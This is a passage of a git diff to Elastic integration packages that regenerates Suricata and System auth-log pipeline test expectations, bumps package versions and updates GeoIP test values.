"{\"timestamp\":\"2020-12-09T16:03:50.083307+0000\",\"flow_id\":289459143040794,\"in_iface\":\"eno6\",\"event_type\":\"tls\",\"src_ip\":\"192.168.50.1\",\"src_port\":12509,\"dest_ip\":\"192.168.50.1\",\"dest_port\":443,\"proto\":\"TCP\",\"tls\":{\"sni\":\"www.example.com\",\"version\":\"UNDETERMINED\",\"ja3\":{\"hash\":\"44d502d471cfdb99c59bdfb0f220e5a8\",\"string\":\"771,4865-4866-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157-47-53,0-23-65281-10-11-35-16-5-13-18-51-45-43-27-41,29-23-24,0\"},\"ja3s\":{}}}", "category": [ "network" @@ -1048,6 +1041,13 @@ ], "created": "2020-04-28T11:07:58.223Z", "kind": "event" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "tls", + "transport": "tcp" } } ] diff --git a/packages/suricata/manifest.yml b/packages/suricata/manifest.yml index 5d76ac99ff5..60b62930a7f 100644 --- a/packages/suricata/manifest.yml +++ b/packages/suricata/manifest.yml @@ -1,6 +1,6 @@ name: suricata title: Suricata Events -version: 1.3.1 +version: 1.3.2 release: ga description: Collect and parse event logs from Suricata instances with Elastic Agent. type: integration 
diff --git a/packages/system/changelog.yml b/packages/system/changelog.yml index 94faf46896a..4a89813af0d 100644 --- a/packages/system/changelog.yml +++ b/packages/system/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.6.6" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.6.5" changes: - description: Change test public IPs to the supported subset diff --git a/packages/system/data_stream/auth/_dev/test/pipeline/test-auth-ubuntu1204.log-expected.json b/packages/system/data_stream/auth/_dev/test/pipeline/test-auth-ubuntu1204.log-expected.json index 48c56ff37ae..5606ca64fdf 100644 --- a/packages/system/data_stream/auth/_dev/test/pipeline/test-auth-ubuntu1204.log-expected.json +++ b/packages/system/data_stream/auth/_dev/test/pipeline/test-auth-ubuntu1204.log-expected.json @@ -24,7 +24,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403832700Z", + "ingested": "2021-12-14T14:55:29.808129024Z", "timezone": "+0000", "kind": "event" }, @@ -64,7 +64,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403841800Z", + "ingested": "2021-12-14T14:55:29.808131455Z", "timezone": "+0000", "kind": "event" }, @@ -99,7 +99,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403847800Z", + "ingested": "2021-12-14T14:55:29.808131907Z", "timezone": "+0000", "kind": "event" }, @@ -135,7 +135,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403853600Z", + "ingested": "2021-12-14T14:55:29.808132319Z", "timezone": "+0000", "kind": "event" }, @@ -175,7 +175,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403859600Z", + "ingested": "2021-12-14T14:55:29.808132773Z", "timezone": "+0000", "kind": "event" }, 
@@ -206,7 +206,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403866400Z", + "ingested": "2021-12-14T14:55:29.808133158Z", "timezone": "+0000", "kind": "event" }, @@ -236,7 +236,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403872100Z", + "ingested": "2021-12-14T14:55:29.808133537Z", "timezone": "+0000", "kind": "event" }, @@ -272,7 +272,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403878700Z", + "ingested": "2021-12-14T14:55:29.808133917Z", "timezone": "+0000", "kind": "event" }, @@ -305,7 +305,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403884200Z", + "ingested": "2021-12-14T14:55:29.808134316Z", "timezone": "+0000", "kind": "event" }, @@ -327,7 +327,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-09T13:45:36.403889300Z", + "ingested": "2021-12-14T14:55:29.808134698Z", "timezone": "+0000", "kind": "event" }, @@ -364,7 +364,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403895200Z", + "ingested": "2021-12-14T14:55:29.808135160Z", "timezone": "+0000", "kind": "event" }, @@ -399,7 +399,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403900Z", + "ingested": "2021-12-14T14:55:29.808135744Z", "timezone": "+0000", "kind": "event" }, @@ -433,7 +433,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403904600Z", + "ingested": "2021-12-14T14:55:29.808136145Z", "timezone": "+0000", "kind": "event" }, @@ -463,7 +463,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403908300Z", + "ingested": "2021-12-14T14:55:29.808136536Z", "timezone": "+0000", "kind": "event" }, @@ -508,7 +508,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-12-09T13:45:36.403913200Z", + "ingested": "2021-12-14T14:55:29.808136913Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", 
@@ -550,7 +550,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403918200Z", + "ingested": "2021-12-14T14:55:29.808137312Z", "timezone": "+0000", "kind": "event" }, @@ -594,7 +594,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403923400Z", + "ingested": "2021-12-14T14:55:29.808137815Z", "timezone": "+0000", "kind": "event" }, @@ -636,7 +636,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403928300Z", + "ingested": "2021-12-14T14:55:29.808138204Z", "timezone": "+0000", "kind": "event" }, @@ -671,7 +671,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403934400Z", + "ingested": "2021-12-14T14:55:29.808138585Z", "timezone": "+0000", "kind": "event" }, @@ -707,7 +707,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403938800Z", + "ingested": "2021-12-14T14:55:29.808138962Z", "timezone": "+0000", "kind": "event" }, @@ -752,7 +752,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-12-09T13:45:36.403943300Z", + "ingested": "2021-12-14T14:55:29.808139353Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -794,7 +794,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403947400Z", + "ingested": "2021-12-14T14:55:29.808139737Z", "timezone": "+0000", "kind": "event" }, @@ -828,7 +828,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403952400Z", + "ingested": "2021-12-14T14:55:29.808140121Z", "timezone": "+0000", "kind": "event" }, @@ -858,7 +858,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403958200Z", + "ingested": "2021-12-14T14:55:29.808140668Z", "timezone": "+0000", "kind": "event" }, @@ -891,7 +891,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403964100Z", + "ingested": "2021-12-14T14:55:29.808141052Z", "timezone": "+0000", "kind": "event" }, 
@@ -928,7 +928,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403969800Z", + "ingested": "2021-12-14T14:55:29.808141438Z", "timezone": "+0000", "kind": "event" }, @@ -973,7 +973,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-12-09T13:45:36.403975600Z", + "ingested": "2021-12-14T14:55:29.808141839Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -1015,7 +1015,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403980100Z", + "ingested": "2021-12-14T14:55:29.808142290Z", "timezone": "+0000", "kind": "event" }, @@ -1049,7 +1049,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.403984700Z", + "ingested": "2021-12-14T14:55:29.808142679Z", "timezone": "+0000", "kind": "event" }, @@ -1079,7 +1079,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404006300Z", + "ingested": "2021-12-14T14:55:29.808143065Z", "timezone": "+0000", "kind": "event" }, @@ -1119,7 +1119,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404010700Z", + "ingested": "2021-12-14T14:55:29.808143469Z", "timezone": "+0000", "kind": "event" }, @@ -1154,7 +1154,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404035700Z", + "ingested": "2021-12-14T14:55:29.808143854Z", "timezone": "+0000", "kind": "event" }, @@ -1191,7 +1191,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404040500Z", + "ingested": "2021-12-14T14:55:29.808144244Z", "timezone": "+0000", "kind": "event" }, @@ -1228,7 +1228,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404045800Z", + "ingested": "2021-12-14T14:55:29.808144620Z", "timezone": "+0000", "kind": "event" }, @@ -1260,7 +1260,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404050100Z", + "ingested": "2021-12-14T14:55:29.808145126Z", "timezone": "+0000", "kind": "event" }, 
@@ -1293,7 +1293,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404059900Z", + "ingested": "2021-12-14T14:55:29.808145504Z", "timezone": "+0000", "kind": "event" }, @@ -1326,7 +1326,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404065100Z", + "ingested": "2021-12-14T14:55:29.808145891Z", "timezone": "+0000", "kind": "event" }, @@ -1363,7 +1363,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404070200Z", + "ingested": "2021-12-14T14:55:29.808146358Z", "timezone": "+0000", "kind": "event" }, @@ -1408,7 +1408,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-12-09T13:45:36.404075200Z", + "ingested": "2021-12-14T14:55:29.808146736Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -1450,7 +1450,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404102300Z", + "ingested": "2021-12-14T14:55:29.808147118Z", "timezone": "+0000", "kind": "event" }, @@ -1494,7 +1494,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404112700Z", + "ingested": "2021-12-14T14:55:29.808147502Z", "timezone": "+0000", "kind": "event" }, @@ -1529,7 +1529,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404118800Z", + "ingested": "2021-12-14T14:55:29.808147885Z", "timezone": "+0000", "kind": "event" }, @@ -1565,7 +1565,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404124800Z", + "ingested": "2021-12-14T14:55:29.808149125Z", "timezone": "+0000", "kind": "event" }, @@ -1595,7 +1595,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404130700Z", + "ingested": "2021-12-14T14:55:29.808149530Z", "timezone": "+0000", "kind": "event" }, @@ -1625,7 +1625,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404136500Z", + "ingested": "2021-12-14T14:55:29.808149915Z", "timezone": "+0000", "kind": "event" }, 
@@ -1658,7 +1658,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404142500Z", + "ingested": "2021-12-14T14:55:29.808150298Z", "timezone": "+0000", "kind": "event" }, @@ -1695,7 +1695,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404148400Z", + "ingested": "2021-12-14T14:55:29.808150683Z", "timezone": "+0000", "kind": "event" }, @@ -1740,7 +1740,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-12-09T13:45:36.404154500Z", + "ingested": "2021-12-14T14:55:29.808151081Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -1782,7 +1782,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404159300Z", + "ingested": "2021-12-14T14:55:29.808151480Z", "timezone": "+0000", "kind": "event" }, @@ -1831,7 +1831,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-12-09T13:45:36.404164100Z", + "ingested": "2021-12-14T14:55:29.808151862Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -1873,7 +1873,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404169700Z", + "ingested": "2021-12-14T14:55:29.808152394Z", "timezone": "+0000", "kind": "event" }, @@ -1917,7 +1917,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404173300Z", + "ingested": "2021-12-14T14:55:29.808152785Z", "timezone": "+0000", "kind": "event" }, @@ -1952,7 +1952,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404178Z", + "ingested": "2021-12-14T14:55:29.808153166Z", "timezone": "+0000", "kind": "event" }, @@ -1986,7 +1986,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404182900Z", + "ingested": "2021-12-14T14:55:29.808153554Z", "category": [ "iam" ], @@ -2021,7 +2021,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404186800Z", + "ingested": "2021-12-14T14:55:29.808153950Z", "category": [ "iam" ], 
@@ -2056,7 +2056,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404191300Z", + "ingested": "2021-12-14T14:55:29.808154335Z", "category": [ "iam" ], @@ -2102,7 +2102,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404195700Z", + "ingested": "2021-12-14T14:55:29.808154744Z", "category": [ "iam" ], @@ -2143,7 +2143,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404201100Z", + "ingested": "2021-12-14T14:55:29.808155130Z", "timezone": "+0000", "kind": "event" }, @@ -2170,7 +2170,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404206200Z", + "ingested": "2021-12-14T14:55:29.808155513Z", "timezone": "+0000", "kind": "event" }, @@ -2197,7 +2197,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404211400Z", + "ingested": "2021-12-14T14:55:29.808155888Z", "timezone": "+0000", "kind": "event" }, @@ -2224,7 +2224,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404216200Z", + "ingested": "2021-12-14T14:55:29.808156268Z", "timezone": "+0000", "kind": "event" }, @@ -2255,7 +2255,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404220700Z", + "ingested": "2021-12-14T14:55:29.808156641Z", "timezone": "+0000", "kind": "event" }, @@ -2288,7 +2288,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404225Z", + "ingested": "2021-12-14T14:55:29.808157019Z", "timezone": "+0000", "kind": "event" }, @@ -2325,7 +2325,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404228700Z", + "ingested": "2021-12-14T14:55:29.808157416Z", "timezone": "+0000", "kind": "event" }, @@ -2360,7 +2360,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404233300Z", + "ingested": "2021-12-14T14:55:29.808157794Z", "timezone": "+0000", "kind": "event" }, 
@@ -2396,7 +2396,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404237900Z", + "ingested": "2021-12-14T14:55:29.808158196Z", "timezone": "+0000", "kind": "event" }, @@ -2437,7 +2437,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404242500Z", + "ingested": "2021-12-14T14:55:29.808158585Z", "timezone": "+0000", "kind": "event" }, @@ -2468,7 +2468,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404246700Z", + "ingested": "2021-12-14T14:55:29.808158973Z", "timezone": "+0000", "kind": "event" }, @@ -2505,7 +2505,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404251900Z", + "ingested": "2021-12-14T14:55:29.808159357Z", "timezone": "+0000", "kind": "event" }, @@ -2540,7 +2540,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404257700Z", + "ingested": "2021-12-14T14:55:29.808159741Z", "timezone": "+0000", "kind": "event" }, @@ -2576,7 +2576,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404262200Z", + "ingested": "2021-12-14T14:55:29.808160120Z", "timezone": "+0000", "kind": "event" }, @@ -2617,7 +2617,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404267Z", + "ingested": "2021-12-14T14:55:29.808160508Z", "timezone": "+0000", "kind": "event" }, @@ -2648,7 +2648,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404272400Z", + "ingested": "2021-12-14T14:55:29.808160891Z", "timezone": "+0000", "kind": "event" }, @@ -2685,7 +2685,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404277300Z", + "ingested": "2021-12-14T14:55:29.808161275Z", "timezone": "+0000", "kind": "event" }, @@ -2720,7 +2720,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404283800Z", + "ingested": "2021-12-14T14:55:29.808161787Z", "timezone": "+0000", "kind": "event" }, 
@@ -2756,7 +2756,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404289800Z", + "ingested": "2021-12-14T14:55:29.808162177Z", "timezone": "+0000", "kind": "event" }, @@ -2789,7 +2789,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404295600Z", + "ingested": "2021-12-14T14:55:29.808162573Z", "timezone": "+0000", "kind": "event" }, @@ -2826,7 +2826,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404301500Z", + "ingested": "2021-12-14T14:55:29.808162964Z", "timezone": "+0000", "kind": "event" }, @@ -2859,7 +2859,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404307Z", + "ingested": "2021-12-14T14:55:29.808163346Z", "timezone": "+0000", "kind": "event" }, @@ -2891,7 +2891,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404310600Z", + "ingested": "2021-12-14T14:55:29.808163736Z", "timezone": "+0000", "kind": "event" }, @@ -2921,7 +2921,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404315Z", + "ingested": "2021-12-14T14:55:29.808164114Z", "timezone": "+0000", "kind": "event" }, @@ -2951,7 +2951,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404320100Z", + "ingested": "2021-12-14T14:55:29.808164507Z", "timezone": "+0000", "kind": "event" }, @@ -2996,7 +2996,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-12-09T13:45:36.404324900Z", + "ingested": "2021-12-14T14:55:29.808164891Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -3038,7 +3038,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404329900Z", + "ingested": "2021-12-14T14:55:29.808165276Z", "timezone": "+0000", "kind": "event" }, @@ -3072,7 +3072,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404335900Z", + "ingested": "2021-12-14T14:55:29.808165677Z", "timezone": "+0000", "kind": "event" }, 
@@ -3102,7 +3102,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404362900Z", + "ingested": "2021-12-14T14:55:29.808166059Z", "timezone": "+0000", "kind": "event" }, @@ -3135,7 +3135,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404369500Z", + "ingested": "2021-12-14T14:55:29.808166445Z", "timezone": "+0000", "kind": "event" }, @@ -3168,7 +3168,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404374Z", + "ingested": "2021-12-14T14:55:29.808166824Z", "timezone": "+0000", "kind": "event" }, @@ -3205,7 +3205,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404378800Z", + "ingested": "2021-12-14T14:55:29.808167212Z", "timezone": "+0000", "kind": "event" }, @@ -3238,7 +3238,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404382500Z", + "ingested": "2021-12-14T14:55:29.808167599Z", "timezone": "+0000", "kind": "event" }, @@ -3275,7 +3275,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404386800Z", + "ingested": "2021-12-14T14:55:29.808167978Z", "timezone": "+0000", "kind": "event" }, @@ -3320,7 +3320,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-12-09T13:45:36.404391400Z", + "ingested": "2021-12-14T14:55:29.808168374Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -3362,7 +3362,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404396600Z", + "ingested": "2021-12-14T14:55:29.808168759Z", "timezone": "+0000", "kind": "event" }, @@ -3406,7 +3406,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404401800Z", + "ingested": "2021-12-14T14:55:29.808169134Z", "timezone": "+0000", "kind": "event" }, @@ -3441,7 +3441,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404405700Z", + "ingested": "2021-12-14T14:55:29.808169518Z", "timezone": "+0000", "kind": "event" }, 
@@ -3477,7 +3477,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404410400Z", + "ingested": "2021-12-14T14:55:29.808169903Z", "timezone": "+0000", "kind": "event" }, @@ -3517,7 +3517,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404416300Z", + "ingested": "2021-12-14T14:55:29.808170284Z", "timezone": "+0000", "kind": "event" }, @@ -3552,7 +3552,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404421600Z", + "ingested": "2021-12-14T14:55:29.808170672Z", "timezone": "+0000", "kind": "event" }, @@ -3588,7 +3588,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404426400Z", + "ingested": "2021-12-14T14:55:29.808171072Z", "timezone": "+0000", "kind": "event" }, @@ -3628,7 +3628,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404432200Z", + "ingested": "2021-12-14T14:55:29.808171520Z", "timezone": "+0000", "kind": "event" }, @@ -3663,7 +3663,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404438Z", + "ingested": "2021-12-14T14:55:29.808171909Z", "timezone": "+0000", "kind": "event" }, @@ -3699,7 +3699,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404443900Z", + "ingested": "2021-12-14T14:55:29.808172296Z", "timezone": "+0000", "kind": "event" }, @@ -3739,7 +3739,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404449700Z", + "ingested": "2021-12-14T14:55:29.808172680Z", "timezone": "+0000", "kind": "event" }, @@ -3774,7 +3774,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404455500Z", + "ingested": "2021-12-14T14:55:29.808173067Z", "timezone": "+0000", "kind": "event" }, @@ -3810,7 +3810,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404459800Z", + "ingested": "2021-12-14T14:55:29.808173510Z", "timezone": "+0000", "kind": "event" }, 
@@ -3850,7 +3850,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404464700Z", + "ingested": "2021-12-14T14:55:29.808173892Z", "timezone": "+0000", "kind": "event" }, @@ -3885,7 +3885,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404469400Z", + "ingested": "2021-12-14T14:55:29.808174267Z", "timezone": "+0000", "kind": "event" }, @@ -3919,7 +3919,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404473600Z", + "ingested": "2021-12-14T14:55:29.808174658Z", "category": [ "iam" ], @@ -3954,7 +3954,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404478200Z", + "ingested": "2021-12-14T14:55:29.808175047Z", "category": [ "iam" ], @@ -3989,7 +3989,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404482500Z", + "ingested": "2021-12-14T14:55:29.808175433Z", "category": [ "iam" ], @@ -4035,7 +4035,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404486400Z", + "ingested": "2021-12-14T14:55:29.808175954Z", "category": [ "iam" ], @@ -4076,7 +4076,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404491100Z", + "ingested": "2021-12-14T14:55:29.808176336Z", "timezone": "+0000", "kind": "event" }, @@ -4103,7 +4103,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404497700Z", + "ingested": "2021-12-14T14:55:29.808176717Z", "timezone": "+0000", "kind": "event" }, @@ -4132,7 +4132,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404501200Z", + "ingested": "2021-12-14T14:55:29.808177107Z", "timezone": "+0000", "kind": "event" }, @@ -4172,7 +4172,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404506100Z", + "ingested": "2021-12-14T14:55:29.808177480Z", "timezone": "+0000", "kind": "event" }, 
@@ -4207,7 +4207,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404511Z", + "ingested": "2021-12-14T14:55:29.808178199Z", "timezone": "+0000", "kind": "event" }, @@ -4243,7 +4243,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404516100Z", + "ingested": "2021-12-14T14:55:29.808178601Z", "timezone": "+0000", "kind": "event" }, @@ -4283,7 +4283,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404521200Z", + "ingested": "2021-12-14T14:55:29.808178981Z", "timezone": "+0000", "kind": "event" }, @@ -4318,7 +4318,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404525100Z", + "ingested": "2021-12-14T14:55:29.808179358Z", "timezone": "+0000", "kind": "event" }, @@ -4354,7 +4354,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404530200Z", + "ingested": "2021-12-14T14:55:29.808179757Z", "timezone": "+0000", "kind": "event" }, @@ -4399,7 +4399,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-12-09T13:45:36.404534500Z", + "ingested": "2021-12-14T14:55:29.808180140Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -4441,7 +4441,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:36.404539300Z", + "ingested": "2021-12-14T14:55:29.808180525Z", "timezone": "+0000", "kind": "event" }, diff --git a/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json b/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json index 97c714057b9..e3b8dab728c 100644 --- a/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json +++ b/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json @@ -37,7 +37,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-12-09T13:45:42.694570800Z", + "ingested": "2021-12-14T14:55:36.054843721Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", 
@@ -91,7 +91,7 @@ "ip": "192.168.33.1" }, "event": { - "ingested": "2021-12-09T13:45:42.694579100Z", + "ingested": "2021-12-14T14:55:36.054846137Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -143,7 +143,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-12-09T13:45:42.694584600Z", + "ingested": "2021-12-14T14:55:36.054846562Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -194,14 +194,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -214,7 +214,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:45:42.694589900Z", + "ingested": "2021-12-14T14:55:36.054846972Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -262,7 +262,7 @@ "hostname": "localhost" }, "event": { - "ingested": "2021-12-09T13:45:42.694595300Z", + "ingested": "2021-12-14T14:55:36.054847329Z", "timezone": "+0000", "kind": "event" }, @@ -303,14 +303,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -322,7 +322,7 @@ "ip": "89.160.20.156" }, "event": { - 